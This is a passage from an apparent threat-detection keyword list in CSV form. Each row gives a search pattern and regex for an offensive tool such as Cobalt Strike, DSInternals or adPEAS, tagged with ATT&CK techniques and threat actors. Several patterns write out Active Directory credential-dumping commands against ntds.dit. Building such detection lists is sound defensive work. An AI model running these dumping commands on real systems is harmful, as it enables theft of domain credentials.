APT41 - Aquatic Panda - AvosLocker - 
Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45654" "*get_stage_magic_mz_86*",".{0,1000}get_stage_magic_mz_86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45655" "*get_stage_magic_pe*",".{0,1000}get_stage_magic_pe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45656" "*get_virtual_Hook_address*",".{0,1000}get_virtual_Hook_address.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","45657" 
"*Get_WinPwn_Repo.sh*",".{0,1000}Get_WinPwn_Repo\.sh.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","45658" "*Get-AccessTokenWithPRT*",".{0,1000}Get\-AccessTokenWithPRT.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","45827" "*Get-AccountPassDontExpire*",".{0,1000}Get\-AccountPassDontExpire.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45828" "*Get-AclModificationRights*",".{0,1000}Get\-AclModificationRights.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","45829" 
"*Get-ActiveTCPConnections*",".{0,1000}Get\-ActiveTCPConnections.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Start-MonitorTCPConnections.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45830" "*Get-ADComputer * -Properties 
PrincipalsAllowedToDelegateToAccount*",".{0,1000}Get\-ADComputer\s.{0,1000}\s\-Properties\sPrincipalsAllowedToDelegateToAccount.{0,1000}","offensive_tool_keyword","powershell","Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack)","T1003 - T1057 - T1087 - T1482 - T1136","TA0001 - TA0002 - TA0005 - TA0006 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45831" "*Get-ADComputer RODC -Properties msDS-RevealedList*",".{0,1000}Get\-ADComputer\sRODC\s\-Properties\smsDS\-RevealedList.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","45834" "*Get-ADCSTemplateACL*",".{0,1000}Get\-ADCSTemplateACL.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","45835" "*Get-ADCSVulns*",".{0,1000}Get\-ADCSVulns.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45836" "*Get-ADDBAccount * -DataBasePath *ntds.dit*",".{0,1000}Get\-ADDBAccount\s.{0,1000}\s\-DataBasePath\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused 
by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45837" "*Get-ADDBAccount * -DBPath *ntds.dit*",".{0,1000}Get\-ADDBAccount\s.{0,1000}\s\-DBPath\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45838" "*Get-ADDBAccount -All -DBPath *.ntds.dit* -BootKey*",".{0,1000}Get\-ADDBAccount\s\-All\s\-DBPath\s.{0,1000}\.ntds\.dit.{0,1000}\s\-BootKey.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45839" "*Get-ADDBAccount* -BootKey* -DataBasePath *.ntds.dit",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-BootKey.{0,1000}\s\-DataBasePath\s.{0,1000}\.ntds\.dit","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45840" "*Get-ADDBAccount* -BootKey* -DBPath 
*.ntds.dit",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-BootKey.{0,1000}\s\-DBPath\s.{0,1000}\.ntds\.dit","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45841" "*Get-ADDBAccount* -DataBasePath *.ntds.dit* -BootKey*",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-DataBasePath\s.{0,1000}\.ntds\.dit.{0,1000}\s\-BootKey.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45842" "*Get-adPEASAccounts*",".{0,1000}Get\-adPEASAccounts.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45848" "*Get-adPEASADCS*",".{0,1000}Get\-adPEASADCS.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45849" 
"*Get-adPEASBloodhound*",".{0,1000}Get\-adPEASBloodhound.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45850" "*Get-adPEASComputer*",".{0,1000}Get\-adPEASComputer.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45851" "*Get-adPEASCreds*",".{0,1000}Get\-adPEASCreds.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45852" "*Get-adPEASDelegation*",".{0,1000}Get\-adPEASDelegation.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45853" "*Get-adPEASDomain*",".{0,1000}Get\-adPEASDomain.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound 
and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45854" "*Get-adPEASGPO*",".{0,1000}Get\-adPEASGPO.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45855" "*Get-adPEASRights*",".{0,1000}Get\-adPEASRights.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45856" "*Get-ADReplAccount -All *",".{0,1000}Get\-ADReplAccount\s\-All\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45857" "*Get-ADUsernameFromEWS*",".{0,1000}Get\-ADUsernameFromEWS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","45862" "*GetADUsers.py*",".{0,1000}GetADUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45863" "*Get-ADUsersWithoutPreAuth*",".{0,1000}Get\-ADUsersWithoutPreAuth.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45864" "*Get-AesKeyFromPassphrase*",".{0,1000}Get\-AesKeyFromPassphrase.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs 
required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","45866" "*getAggressorClient*",".{0,1000}getAggressorClient.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45867" 
"*getAllUserSpns*",".{0,1000}getAllUserSpns.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","45868" "*Get-and-Brute-LocalAccount.ps1*",".{0,1000}Get\-and\-Brute\-LocalAccount\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45869" "*Get-AndDisplayInformation -ClassName 
""Win32_BIOS""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_BIOS\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45870" "*Get-AndDisplayInformation -ClassName ""Win32_ComputerSystem"" -PropertyFilter UserName*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_ComputerSystem\""\s\-PropertyFilter\sUserName.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45871" "*Get-AndDisplayInformation -ClassName ""Win32_ComputerSystem""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_ComputerSystem\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45872" "*Get-AndDisplayInformation -ClassName ""Win32_Desktop""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_Desktop\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
